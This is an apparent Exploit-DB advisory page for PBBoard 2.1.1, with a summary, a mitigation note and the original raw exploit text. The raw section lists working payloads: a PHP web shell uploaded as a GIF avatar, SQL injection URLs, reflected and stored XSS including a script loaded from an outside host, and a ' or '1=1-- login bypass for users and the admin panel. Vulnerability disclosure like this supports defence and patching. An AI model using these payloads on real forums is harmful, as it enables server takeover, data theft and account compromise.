header-logo
Suggest Exploit
vendor:
PBBoard
by:
JIKO (JAWAD)
8,8
CVSS
HIGH
Remote Code Execution, SQL Injection, XSS
89, 89, 79
CWE
Product Name: PBBoard
Affected Version From: 2.1.1
Affected Version To: 2.1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:pbboard:pbboard:2.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PBBoard 2.1.1 Multiple Remote Vulnerabilities

PBBoard 2.1.1 is vulnerable to remote code execution, SQL injection and XSS. An attacker can upload a malicious shell with a GIF89a header to execute arbitrary code on the server. SQL injection can be performed by inserting a single quote (') in all % variables in the script. XSS can be performed by inserting a malicious script in the URL. An attacker can also gain access to the admin panel by using SQL injection in the username field.

Mitigation:

Input validation should be performed on all user-supplied data. Access to the admin panel should be restricted to trusted users only.
Source

Exploit-DB raw data:

==================================================
PBBoard 2.1.1 Multiple Remote Vulnerabilities
==================================================

  |=-----------------------------------------------------=|
  |=-------------=[  JIKO |No-exploit.Com|  ]=-----------=|
  |=-----------------------------------------------------=|
[~]-----------|00|
NAme    :JIKO (JAWAD)
Home    :No-exploit.Com
Mail    : !x!
[~]-----------|01|
    -{Script}
    name :PBBoard_v2.1.1
    link :http://www.pbboard.com/PBBoard_v2.1.1.zip
 
[~]-----------|02|
    -{3xpl01t}
    
    upload Shell and file .exe ....etc :(
    http://localhost/ara/index.php?page=usercp&control=1&avatar=1&main=1
    select From my Pc
    and upload your Shell php with GIF89a; you can see the size of img is long use a programme for inser php code in img
    
    sql & xss
    all script is infected :(
    inser '( in all % variable in the script
    SQl :/index.php?page=forum&show=1&id=2'a
    Xss :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script>
    
    SQl :/index.php?page=profile&show=1&username=jawad'
    SQl :/index.php?page=profile&show=1&username=jawad' and id='1
    Xss :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script>
    ........etc
    
    Xss In Profil
    
    Url :/index.php?page=usercp&control=1&avatar=1&main=1
    Select img From Url
    http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif
    
    Login :(
    
    User : real name of admin or member you want | jawad' or '1=1--
    Pass : jiko
    
    for admin panel
    
    Url  : /admin.php
    User : jawad' or '1=1--
    Pass : jiko
    :((..Etc exploit
    
    
[~]-----------|03|
    -{Greetz}
    All my friends
    |No-Exploit.com Members
-------------------------------------